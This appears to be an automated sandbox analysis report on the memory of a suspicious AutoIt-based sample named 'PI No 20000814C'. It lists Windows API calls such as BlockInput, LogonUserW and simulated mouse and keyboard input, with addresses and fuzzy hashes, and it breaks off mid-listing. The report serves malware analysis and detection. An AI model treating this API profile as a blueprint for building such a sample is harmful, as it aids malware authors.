                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    APIs
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00F3BBA2,?,?,?,?,00000000,?), ref: 00F8D740
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                      • Part of subcall function 00F02344: GetCursorPos.USER32(?), ref: 00F02357
                                      • Part of subcall function 00F02344: ScreenToClient.USER32(00FC67B0,?), ref: 00F02374
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000001), ref: 00F02399
                                      • Part of subcall function 00F02344: GetAsyncKeyState.USER32(00000002), ref: 00F023A7
                                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00F3BC4F,?,?,?,?,?,00000001,?), ref: 00F8C272
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                    • String ID:
                                    • API String ID: 2356834413-0
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00F01B04,?,?,?,?,?), ref: 00F018E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 00F74218
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F8CBEE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    APIs
                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00F64F18
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID:
                                    • API String ID: 2434400541-0
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F588D1), ref: 00F58CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    • Opcode ID: 0bef6abfeb9c8b3089f3fe3836df558d6c6a502521b41f06a91e084471a57da4
                                    • Instruction ID: 2ea6c78a4e86eab450a2c385aba91aac799dab87588230bed2e1480a2950abaa
                                    • Opcode Fuzzy Hash: 0bef6abfeb9c8b3089f3fe3836df558d6c6a502521b41f06a91e084471a57da4
                                    • Instruction Fuzzy Hash: ACD09E3226450EAFEF019EA4DD05EFE3B69EB04B01F408511FE15D51A1C775D935AB60
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00F3BC0C,?,?,?,?,?,?), ref: 00F8CC24
                                      • Part of subcall function 00F8B8EF: _memset.LIBCMT ref: 00F8B8FE
                                      • Part of subcall function 00F8B8EF: _memset.LIBCMT ref: 00F8B90D
                                      • Part of subcall function 00F8B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FC7F20,00FC7F64), ref: 00F8B93C
                                      • Part of subcall function 00F8B8EF: CloseHandle.KERNEL32 ref: 00F8B94E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                    • String ID:
                                    • API String ID: 2364484715-0
                                    • Opcode ID: d5f30566ef7a6089d62ea9529fc0b5137257e9fcfa4cf60770858a85719aa374
                                    • Instruction ID: 8ecdc445fe4bf6bdc8440318453708bda418d8bf32477b091fcec39f609b0601
                                    • Opcode Fuzzy Hash: d5f30566ef7a6089d62ea9529fc0b5137257e9fcfa4cf60770858a85719aa374
                                    • Instruction Fuzzy Hash: 29E0B636210248DFCB01AF44DE45E9637A5FB1D751F018055FA055B2B2CB31A960FFA0
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00F01AEE,?,?,?), ref: 00F016AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 24042bc2404024138733a61db8ea26d4264553e9c2e4a6372d2d58cacd5fcf19
                                    • Instruction ID: 64b9be60adfdb66976a31866e70da359ba77a1736f3371ec442c77b994474df3
                                    • Opcode Fuzzy Hash: 24042bc2404024138733a61db8ea26d4264553e9c2e4a6372d2d58cacd5fcf19
                                    • Instruction Fuzzy Hash: 90E0EC35204208BBCF45AF90DC16E653B26FF48314F108418FA454B2E2CF37A521FB60
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 00F8CBA4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: f916953d60238b9648e336eafd873d02d559ec05797bf987e27fc34557cc1779
                                    • Instruction ID: a53812615f5b500f62d9cae1b80be7e131274528496e31d54fba6211791e6c94
                                    • Opcode Fuzzy Hash: f916953d60238b9648e336eafd873d02d559ec05797bf987e27fc34557cc1779
                                    • Instruction Fuzzy Hash: 82E0E23520020CEFCB01DF88D945DD63BA5AB1D300F004054FA054B362CB71A830EBA1
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL ref: 00F8CB75
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 5e823843a8b6cf39a9036ea612a16131d4dcfda5f62fcba3c7dec5270a347bef
                                    • Instruction ID: 323ea9554fd64a4d6aba795c8f03528f30e712a201a7c49e60542554ef727344
                                    • Opcode Fuzzy Hash: 5e823843a8b6cf39a9036ea612a16131d4dcfda5f62fcba3c7dec5270a347bef
                                    • Instruction Fuzzy Hash: EBE0427525424DAFDB01DF88D985E963BA5AB1D700F054054FA155B362CB71A830EB61
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                      • Part of subcall function 00F0201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00F020D3
                                      • Part of subcall function 00F0201B: KillTimer.USER32(-00000001,?,?,?,?,00F016CB,00000000,?,?,00F01AE2,?,?), ref: 00F0216E
                                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00F01AE2,?,?), ref: 00F016D4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                    • String ID:
                                    • API String ID: 2797419724-0
                                    • Opcode ID: 8238cca3592798e0f24a5d1735d6faaf9efb4db736edda64c83ff1ee62e8262f
                                    • Instruction ID: 557dcfad80337078e3800a238ad65ca22eb2b8459ad73848d0ab64a32cffaed1
                                    • Opcode Fuzzy Hash: 8238cca3592798e0f24a5d1735d6faaf9efb4db736edda64c83ff1ee62e8262f
                                    • Instruction Fuzzy Hash: FCD012302403087BDA102B50DD1FF5A3A199B58750F408420BA04691D3CA766820B568
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 00F42242
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 81c7efc6849f47dfe96646446650bc756f9f9e3c9a31e3bfaa24910371f3cb62
                                    • Instruction ID: 02debf24e656448e9b32c076a1d975dc09da22bf2ac870b0d4c38ac40445b6ed
                                    • Opcode Fuzzy Hash: 81c7efc6849f47dfe96646446650bc756f9f9e3c9a31e3bfaa24910371f3cb62
                                    • Instruction Fuzzy Hash: F8C04CF180010DDFDB05DB90D988DFE77BCBB04304F104155A501F2100D7749B449B71
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F2A36A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 85c66bce7b769c4f9c4ea38dbd27f6c5d2d30077c7e1069654fd7b9bd41e9856
                                    • Instruction ID: fcb639c40ccd47c38f5089546237dc154cba8e173aeab0b6cc0d02a8a6bbfdc9
                                    • Opcode Fuzzy Hash: 85c66bce7b769c4f9c4ea38dbd27f6c5d2d30077c7e1069654fd7b9bd41e9856
                                    • Instruction Fuzzy Hash: ADA0113000020CAB8A002B82EC088A8BFACEA022A0B008020F80C800228B32A820AA80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b5f6aad0b9ab62f6e28e7c2464fb65ffeacc804f57ac87952920fba6f1f9e670
                                    • Instruction ID: 081d0c578c7a76f593e2506fda5b9c1216b46b878870887f21faf5b5e14e81fc
                                    • Opcode Fuzzy Hash: b5f6aad0b9ab62f6e28e7c2464fb65ffeacc804f57ac87952920fba6f1f9e670
                                    • Instruction Fuzzy Hash: 5F224631D05656CBCF28CB14C6A47BE77A1EB417A1F28442AD9428B291DB34DDC6FBA0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction ID: f91d4ce9cdd7c41b200ac41079a421c2846d278a62473ac55becdbcb175192c1
                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction Fuzzy Hash: 1EC181326060B309DF6D8639B53413EBAE16EA27B131A076DE4B3CB5C5EF20D564F620
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction ID: f85309298f7971c068f38d79b988b96632720d8a65ef48707fbaedaa6c9776be
                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction Fuzzy Hash: AAC194336061B309DF6D8639B53413EBBE16AA27B131A076DE4B2DB5D4EF20D524F620
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: 1a028a34ddff762eb9a2dd10b9ca66f3fd6c5f55a8f505a0aa39e32065c7a086
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: D9C193366061B309DF2D8639B53417EBAE17AB27B131A076DE8B2CB5C4EF20D524F614
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00F77B70
                                    • DeleteObject.GDI32(00000000), ref: 00F77B82
                                    • DestroyWindow.USER32 ref: 00F77B90
                                    • GetDesktopWindow.USER32 ref: 00F77BAA
                                    • GetWindowRect.USER32(00000000), ref: 00F77BB1
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F77CF2
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F77D02
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77D4A
                                    • GetClientRect.USER32(00000000,?), ref: 00F77D56
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F77D90
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DB2
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DC5
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DD0
                                    • GlobalFix.KERNEL32(00000000), ref: 00F77DD9
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DE8
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00F77DF1
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DF8
                                    • GlobalFree.KERNEL32(00000000), ref: 00F77E03
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F92CAC,00000000), ref: 00F77E2B
                                    • GlobalFree.KERNEL32(00000000), ref: 00F77E3B
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F77E61
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F77E80
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77EA2
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F7808F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Global$Rect$CreateFile$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadMessagePictureReadSendShowSizeWire
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2547915802-2373415609
                                    • Opcode ID: 2931fe8511728b10be28e33b4bd689547779f554f3dc0d5481cb62ea01622ddf
                                    • Instruction ID: 9818068d2a11ea601cc210cbec64d16eaa48e96fa7b1029dc70f6cd660c2832f
                                    • Opcode Fuzzy Hash: 2931fe8511728b10be28e33b4bd689547779f554f3dc0d5481cb62ea01622ddf
                                    • Instruction Fuzzy Hash: CF027D71910219AFDF14DFA4CD89EAE7BB9EF48310F108159F909EB2A1DB749D01EB60
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,00F8F910), ref: 00F838AF
                                    • IsWindowVisible.USER32(?), ref: 00F838D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharUpperVisibleWindow
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 4105515805-45149045
                                    • Opcode ID: baceeeb1f8f2dfc1d6400c86aa9d67142e9965b6dc1889f745bf88798d68c648
                                    • Instruction ID: e71978d35d7b40774a20839c994efeecb28291060032beb6b703f201146c518d
                                    • Opcode Fuzzy Hash: baceeeb1f8f2dfc1d6400c86aa9d67142e9965b6dc1889f745bf88798d68c648
                                    • Instruction Fuzzy Hash: A1D18D31208216DFCB14FF11C851AAA77A1AF94754F144458B8865B2F3DF79EE0AFB81
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 00F8A89F
